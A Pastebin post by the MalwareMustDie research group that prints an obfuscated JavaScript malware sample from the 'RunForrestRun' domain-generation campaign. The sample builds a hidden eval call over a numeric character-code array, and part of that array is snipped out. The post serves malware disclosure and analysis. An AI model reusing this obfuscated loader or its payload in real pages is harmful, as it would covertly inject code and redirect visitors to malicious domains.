Advertisement
MalwareMustDie

DGA (PseudoRandom Domain) RunForrestRun, Decoding 1st Step

Nov 2nd, 2013
1,891
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // MalwareMustDie
  2. // DGA (PseudoRandom Domain) RunForrestRun, New Obfuscation
  3. // Decoding step 1 @unixfreaxjp /malware/checkdomains]$ date
  4. // Sat Nov  2 19:00:15 JST 2013
  5.  
  6. try {
  7.   prototype % 2;
  8. }
  9. catch (asd){
  10.   x = 2;
  11. }
  12. try {
  13.   q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l"+ "e" + "m" + ((f) ?   "e" + "n" + "t" : "")]("p");
  14.   q.appendChild(q + "");
  15. }
  16. catch (fwbewe){
  17.   i = 0;
  18.   try {
  19.     prototype * 5;
  20.   }
  21.   catch (z){
  22.     fr = "fromChar";
  23.     f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660,
  24.     500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160,
  25.     708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606,
  26.     500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590,
  27.     582, 570, 192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600,
  28.     160, 222, 160, 696, 520, 630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485,
  29.     684, 160, 696, 505, 690, 580, 192, 305, 192, 580, 624, 525, 690, 230, 390, 160, 252,
  30.     160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230, 492, 160, 252, 160, 624, 525,
  31.     354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160, 372, 160, 288,
  32.     205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575,
  33.     606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750,
  34.     160, 606, 540, 690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580,
  35.  
  36.              (((( SNIPPED FOR SECURITY PURPOSE ))))
  37.  
  38.     485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585,
  39.     660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192,
  40.     50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545,
  41.     276, 575, 696, 605, 648, 505, 276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288,
  42.     560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160,
  43.     192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 624, 505, 630, 515, 624,
  44.     580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160,
  45.     192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606,
  46.     230, 708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525,
  47.     600, 500, 606, 550, 204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192,
  48.     160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230,
  49.     582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246,
  50.     295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594
  51.     , 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205,
  52.     354];
  53.     v = "eva";
  54.   }
  55.   if (v)e = window[v + "l"];
  56.   w = f;
  57.   s = [];
  58.   r = String;
  59.   z = ((e) ? "Code" : "");
  60.   for (;
  61.   1776 - 5 + 5 > i; i += 1){
  62.     j = i;
  63.     if (e)s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
  64.   }
  65.   if (f)e(s);
  66. }
  67.  
  68. //-----
  69. // #MalwareMustDie!! @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement